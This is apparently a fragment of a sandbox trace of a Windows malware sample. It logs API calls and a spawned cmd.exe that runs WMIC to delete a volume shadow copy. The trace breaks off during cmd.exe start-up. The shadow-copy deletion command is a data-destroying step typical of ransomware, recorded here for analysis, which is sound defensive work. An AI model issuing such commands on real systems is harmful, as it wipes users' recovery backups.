(_Block=0x60ce20) [0106.596] free (_Block=0x60cb00) [0106.596] free (_Block=0x60cb20) [0106.596] free (_Block=0x60cf30) [0106.596] free (_Block=0x60cb60) [0106.596] free (_Block=0x607ee0) [0106.596] free (_Block=0x607f30) [0106.596] free (_Block=0x607f80) [0106.596] free (_Block=0x60cb80) [0106.596] free (_Block=0x606a20) [0106.596] free (_Block=0x606de0) [0106.596] free (_Block=0x608040) [0106.597] free (_Block=0x606dc0) [0106.597] free (_Block=0x608000) [0106.597] free (_Block=0x606d60) [0106.597] free (_Block=0x606d80) [0106.597] free (_Block=0x606c40) [0106.597] free (_Block=0x606c60) [0106.597] free (_Block=0x606be0) [0106.597] free (_Block=0x606c00) [0106.597] free (_Block=0x606ca0) [0106.597] free (_Block=0x606cc0) [0106.597] free (_Block=0x606d00) [0106.597] free (_Block=0x606d20) [0106.597] free (_Block=0x606b20) [0106.597] free (_Block=0x606b40) [0106.597] free (_Block=0x606ac0) [0106.597] free (_Block=0x606ae0) [0106.597] free (_Block=0x606b80) [0106.597] free (_Block=0x606ba0) [0106.597] free (_Block=0x606a60) [0106.597] free (_Block=0x606a80) [0106.598] free (_Block=0x6069d0) [0106.598] free (_Block=0x6069a0) [0106.598] free (_Block=0x606e90) [0106.598] WbemLocator:IUnknown:Release (This=0x1c71390) returned 0x2 [0106.598] WbemLocator:IUnknown:Release (This=0x1c83b28) returned 0x0 [0106.598] WbemLocator:IUnknown:Release (This=0x1c83a98) returned 0x0 [0106.599] WbemLocator:IUnknown:Release (This=0x1c71390) returned 0x1 [0106.599] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0106.599] WbemLocator:IUnknown:Release (This=0x1c71390) returned 0x0 [0106.599] free (_Block=0x60c9e0) [0106.599] free (_Block=0x60ca00) [0106.599] free (_Block=0x608540) [0106.599] free (_Block=0x60ca20) [0106.599] free (_Block=0x60ca40) [0106.599] free (_Block=0x608580) [0106.599] free (_Block=0x60c860) [0106.599] free (_Block=0x60c880) [0106.599] free (_Block=0x6083c0) [0106.599] free (_Block=0x60c8a0) [0106.599] free (_Block=0x60c8c0) [0106.599] free (_Block=0x608400) [0106.599] free (_Block=0x60c7e0) [0106.599] free (_Block=0x60c800) [0106.599] free (_Block=0x608340) [0106.600] free (_Block=0x60c820) [0106.600] free (_Block=0x60c840) [0106.600] free (_Block=0x608380) [0106.600] free (_Block=0x60c960) [0106.600] free (_Block=0x60c980) [0106.600] free (_Block=0x6084c0) [0106.600] free (_Block=0x60c9a0) [0106.600] free (_Block=0x60c9c0) [0106.600] free (_Block=0x608500) [0106.600] free (_Block=0x60c760) [0106.600] free (_Block=0x60c780) [0106.600] free (_Block=0x6082c0) [0106.600] free (_Block=0x60c7a0) [0106.600] free (_Block=0x60c7c0) [0106.600] free (_Block=0x608300) [0106.600] free (_Block=0x60c8e0) [0106.600] free (_Block=0x60c900) [0106.600] free (_Block=0x608440) [0106.601] free (_Block=0x60c920) [0106.601] free (_Block=0x60c940) [0106.601] free (_Block=0x608480) [0106.601] free (_Block=0x60c6a0) [0106.601] free (_Block=0x60c6c0) [0106.601] free (_Block=0x608200) [0106.601] free (_Block=0x60c560) [0106.601] free (_Block=0x60c580) [0106.601] free (_Block=0x6080c0) [0106.601] free (_Block=0x606e50) [0106.601] free (_Block=0x606e70) [0106.601] free (_Block=0x608080) [0106.601] free (_Block=0x60c5e0) [0106.601] free (_Block=0x60c600) [0106.601] free (_Block=0x608140) [0106.601] free (_Block=0x60c6e0) [0106.601] free (_Block=0x60c700) [0106.601] free (_Block=0x608240) [0106.601] free (_Block=0x60c5a0) [0106.602] free (_Block=0x60c5c0) [0106.602] free (_Block=0x608100) [0106.602] free (_Block=0x60c620) [0106.602] free (_Block=0x60c640) [0106.602] free (_Block=0x608180) [0106.602] free (_Block=0x60c660) [0106.602] free (_Block=0x60c680) [0106.602] free (_Block=0x6081c0) [0106.602] free (_Block=0x60c720) [0106.602] free (_Block=0x60c740) [0106.602] free (_Block=0x608280) [0106.602] CoUninitialize () [0106.632] exit (_Code=0) [0106.632] free (_Block=0x60cd30) [0106.633] free (_Block=0x607ea0) [0106.633] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0106.633] free (_Block=0x606f40) [0106.633] free (_Block=0x606a40) [0106.633] free (_Block=0x607e60) [0106.633] free (_Block=0x607e20) [0106.633] free (_Block=0x607dd0) [0106.633] free (_Block=0x607d90) [0106.633] free (_Block=0x607d30) [0106.633] free (_Block=0x605a90) [0106.633] free (_Block=0x605a50) [0106.633] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0106.633] free (_Block=0x60cec0) Thread: id = 188 os_tid = 0xb74 Thread: id = 189 os_tid = 0xad8 Thread: id = 190 os_tid = 0x618 Thread: id = 191 os_tid = 0xb60 Thread: id = 192 os_tid = 0xb3c Process: id = "32" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x2650d000" os_pid = "0x270" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 193 os_tid = 0x71c [0106.737] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfe10 | out: lpSystemTimeAsFileTime=0x2cfe10*(dwLowDateTime=0x4731c270, dwHighDateTime=0x1d68245)) [0106.737] GetCurrentProcessId () returned 0x270 [0106.737] GetCurrentThreadId () returned 0x71c [0106.737] GetTickCount () returned 0x115058d [0106.737] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfe18 | out: lpPerformanceCount=0x2cfe18*=22663008882) returned 1 [0106.739] GetModuleHandleW (lpModuleName=0x0) returned 0x49df0000 [0106.739] __set_app_type (_Type=0x1) [0106.740] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e17810) returned 0x0 [0106.740] __getmainargs (in: _Argc=0x49e3a608, _Argv=0x49e3a618, _Env=0x49e3a610, _DoWildCard=0, _StartInfo=0x49e1e0f4 | out: _Argc=0x49e3a608, _Argv=0x49e3a618, _Env=0x49e3a610) returned 0 [0106.740] GetCurrentThreadId () returned 0x71c [0106.740] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x71c) returned 0x3c [0106.740] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0106.740] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0106.740] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0106.741] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0106.741] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfda8 | out: phkResult=0x2cfda8*=0x0) returned 0x2 [0106.742] VirtualQuery (in: lpAddress=0x2cfd90, lpBuffer=0x2cfd10, dwLength=0x30 | out: lpBuffer=0x2cfd10*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0106.742] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfd10, dwLength=0x30 | out: lpBuffer=0x2cfd10*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0106.742] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfd10, dwLength=0x30 | out: lpBuffer=0x2cfd10*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0106.742] VirtualQuery (in: lpAddress=0x1d4000, lpBuffer=0x2cfd10, dwLength=0x30 | out: lpBuffer=0x2cfd10*(BaseAddress=0x1d4000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0106.742] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfd10, dwLength=0x30 | out: lpBuffer=0x2cfd10*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30 [0106.742] GetConsoleOutputCP () returned 0x1b5 [0106.742] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e2bfe0 | out: lpCPInfo=0x49e2bfe0) returned 1 [0106.742] SetConsoleCtrlHandler (HandlerRoutine=0x49e13184, Add=1) returned 1 [0106.742] _get_osfhandle (_FileHandle=1) returned 0x7 [0106.742] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0106.743] _get_osfhandle (_FileHandle=1) returned 0x7 [0106.743] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e1e194 | out: lpMode=0x49e1e194) returned 1 [0106.743] _get_osfhandle (_FileHandle=1) returned 0x7 [0106.743] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0106.743] _get_osfhandle (_FileHandle=0) returned 0x3 [0106.743] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e1e198 | out: lpMode=0x49e1e198) returned 1 [0106.744] _get_osfhandle (_FileHandle=0) returned 0x3 [0106.744] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0106.744] GetEnvironmentStringsW () returned 0x3d8b90* [0106.744] GetProcessHeap () returned 0x3c0000 [0106.744] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xa7c) returned 0x3d9620 [0106.744] FreeEnvironmentStringsW (penv=0x3d8b90) returned 1 [0106.744] GetProcessHeap () returned 0x3c0000 [0106.744] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x8) returned 0x3d8a10 [0106.744] GetEnvironmentStringsW () returned 0x3d8b90* [0106.744] GetProcessHeap () returned 0x3c0000 [0106.744] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xa7c) returned 0x3da0b0 [0106.745] FreeEnvironmentStringsW (penv=0x3d8b90) returned 1 [0106.745] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cec68 | out: phkResult=0x2cec68*=0x44) returned 0x0 [0106.745] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cec60, lpData=0x2cec80, lpcbData=0x2cec64*=0x1000 | out: lpType=0x2cec60*=0x0, lpData=0x2cec80*=0x18, lpcbData=0x2cec64*=0x1000) returned 0x2 [0106.745] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cec60, lpData=0x2cec80, lpcbData=0x2cec64*=0x1000 | out: lpType=0x2cec60*=0x4, lpData=0x2cec80*=0x1, lpcbData=0x2cec64*=0x4) returned 0x0 [0106.745] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cec60, lpData=0x2cec80, lpcbData=0x2cec64*=0x1000 | out: lpType=0x2cec60*=0x0, lpData=0x2cec80*=0x1, lpcbData=0x2cec64*=0x1000) returned 0x2 [0106.745] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cec60, lpData=0x2cec80, lpcbData=0x2cec64*=0x1000 | out: lpType=0x2cec60*=0x4, lpData=0x2cec80*=0x0, lpcbData=0x2cec64*=0x4) returned 0x0 [0106.745] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cec60, lpData=0x2cec80, lpcbData=0x2cec64*=0x1000 | out: lpType=0x2cec60*=0x4, lpData=0x2cec80*=0x40, lpcbData=0x2cec64*=0x4) returned 0x0 [0106.745] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cec60, lpData=0x2cec80, lpcbData=0x2cec64*=0x1000 | out: lpType=0x2cec60*=0x4, lpData=0x2cec80*=0x40, lpcbData=0x2cec64*=0x4) returned 0x0 [0106.745] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cec60, lpData=0x2cec80, lpcbData=0x2cec64*=0x1000 | out: lpType=0x2cec60*=0x0, lpData=0x2cec80*=0x40, lpcbData=0x2cec64*=0x1000) returned 0x2 [0106.745] RegCloseKey (hKey=0x44) returned 0x0 [0106.745] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cec68 | out: phkResult=0x2cec68*=0x44) returned 0x0 [0106.745] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cec60, lpData=0x2cec80, lpcbData=0x2cec64*=0x1000 | out: lpType=0x2cec60*=0x0, lpData=0x2cec80*=0x40, lpcbData=0x2cec64*=0x1000) returned 0x2 [0106.746] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cec60, lpData=0x2cec80, lpcbData=0x2cec64*=0x1000 | out: lpType=0x2cec60*=0x4, lpData=0x2cec80*=0x1, lpcbData=0x2cec64*=0x4) returned 0x0 [0106.746] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cec60, lpData=0x2cec80, lpcbData=0x2cec64*=0x1000 | out: lpType=0x2cec60*=0x0, lpData=0x2cec80*=0x1, lpcbData=0x2cec64*=0x1000) returned 0x2 [0106.746] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cec60, lpData=0x2cec80, lpcbData=0x2cec64*=0x1000 | out: lpType=0x2cec60*=0x4, lpData=0x2cec80*=0x0, lpcbData=0x2cec64*=0x4) returned 0x0 [0106.746] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cec60, lpData=0x2cec80, lpcbData=0x2cec64*=0x1000 | out: lpType=0x2cec60*=0x4, lpData=0x2cec80*=0x9, lpcbData=0x2cec64*=0x4) returned 0x0 [0106.746] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cec60, lpData=0x2cec80, lpcbData=0x2cec64*=0x1000 | out: lpType=0x2cec60*=0x4, lpData=0x2cec80*=0x9, lpcbData=0x2cec64*=0x4) returned 0x0 [0106.746] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cec60, lpData=0x2cec80, lpcbData=0x2cec64*=0x1000 | out: lpType=0x2cec60*=0x0, lpData=0x2cec80*=0x9, lpcbData=0x2cec64*=0x1000) returned 0x2 [0106.746] RegCloseKey (hKey=0x44) returned 0x0 [0106.746] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51744f [0106.746] srand (_Seed=0x5f51744f) [0106.746] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete" [0106.746] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete" [0106.746] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e2c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0106.746] GetProcessHeap () returned 0x3c0000 [0106.747] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x218) returned 0x3dab40 [0106.747] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3dab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0106.747] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0106.747] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e1f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0106.747] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e1f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0106.747] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0106.747] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0106.747] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0106.747] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0106.747] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0106.747] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0106.747] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0106.747] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0106.747] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0106.747] GetProcessHeap () returned 0x3c0000 [0106.747] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d9620 | out: hHeap=0x3c0000) returned 1 [0106.747] GetEnvironmentStringsW () returned 0x3d8b90* [0106.747] GetProcessHeap () returned 0x3c0000 [0106.747] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xa94) returned 0x3dad60 [0106.748] FreeEnvironmentStringsW (penv=0x3d8b90) returned 1 [0106.748] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0106.748] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e1f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0106.748] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0106.748] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0106.748] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0106.748] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0106.748] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0106.748] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0106.748] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0106.748] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0106.748] GetProcessHeap () returned 0x3c0000 [0106.748] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x5c) returned 0x3db800 [0106.748] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cfa70 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0106.748] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2cfa70, lpFilePart=0x2cfa50 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cfa50*="Desktop") returned 0x25 [0106.748] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0106.748] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf780 | out: lpFindFileData=0x2cf780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x3db870 [0106.749] FindClose (in: hFindFile=0x3db870 | out: hFindFile=0x3db870) returned 1 [0106.749] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2cf780 | out: lpFindFileData=0x2cf780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3db870 [0106.749] FindClose (in: hFindFile=0x3db870 | out: hFindFile=0x3db870) returned 1 [0106.749] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0106.749] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2cf780 | out: lpFindFileData=0x2cf780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x3db870 [0106.749] FindClose (in: hFindFile=0x3db870 | out: hFindFile=0x3db870) returned 1 [0106.749] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0106.749] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0106.749] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0106.749] GetProcessHeap () returned 0x3c0000 [0106.749] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3dad60 | out: hHeap=0x3c0000) returned 1 [0106.749] GetEnvironmentStringsW () returned 0x3db870* [0106.750] GetProcessHeap () returned 0x3c0000 [0106.750] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xae8) returned 0x3dc360 [0106.750] FreeEnvironmentStringsW (penv=0x3db870) returned 1 [0106.750] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e2c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0106.750] GetProcessHeap () returned 0x3c0000 [0106.750] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3db800 | out: hHeap=0x3c0000) returned 1 [0106.750] GetProcessHeap () returned 0x3c0000 [0106.750] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x4016) returned 0x3dce50 [0106.750] GetProcessHeap () returned 0x3c0000 [0106.750] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xe4) returned 0x3d9680 [0106.750] GetProcessHeap () returned 0x3c0000 [0106.750] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3dce50 | out: hHeap=0x3c0000) returned 1 [0106.751] GetConsoleOutputCP () returned 0x1b5 [0106.751] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e2bfe0 | out: lpCPInfo=0x49e2bfe0) returned 1 [0106.751] GetUserDefaultLCID () returned 0x409 [0106.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e27b50, cchData=8 | out: lpLCData=":") returned 2 [0106.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfb80, cchData=128 | out: lpLCData="0") returned 2 [0106.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfb80, cchData=128 | out: lpLCData="0") returned 2 [0106.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfb80, cchData=128 | out: lpLCData="1") returned 2 [0106.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e3a740, cchData=8 | out: lpLCData="/") returned 2 [0106.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e3a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0106.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e3a460, cchData=32 | out: lpLCData="Tue") returned 4 [0106.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e3a420, cchData=32 | out: lpLCData="Wed") returned 4 [0106.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e3a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0106.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e3a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0106.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e3a360, cchData=32 | out: lpLCData="Sat") returned 4 [0106.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e3a700, cchData=32 | out: lpLCData="Sun") returned 4 [0106.752] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e27b40, cchData=8 | out: lpLCData=".") returned 2 [0106.752] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e3a4e0, cchData=8 | out: lpLCData=",") returned 2 [0106.752] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0106.753] GetProcessHeap () returned 0x3c0000 [0106.753] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20c) returned 0x3d97e0 [0106.753] GetConsoleTitleW (in: lpConsoleTitle=0x3d97e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0106.753] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0106.753] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0106.753] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0106.753] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0106.754] GetProcessHeap () returned 0x3c0000 [0106.754] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x4012) returned 0x3dce50 [0106.754] GetProcessHeap () returned 0x3c0000 [0106.754] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3dce50 | out: hHeap=0x3c0000) returned 1 [0106.757] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0106.757] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0106.757] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0106.757] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0106.757] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0106.757] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0106.757] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0106.757] GetProcessHeap () returned 0x3c0000 [0106.757] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb0) returned 0x3d9a00 [0106.757] GetProcessHeap () returned 0x3c0000 [0106.757] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x54) returned 0x3d9ac0 [0106.760] 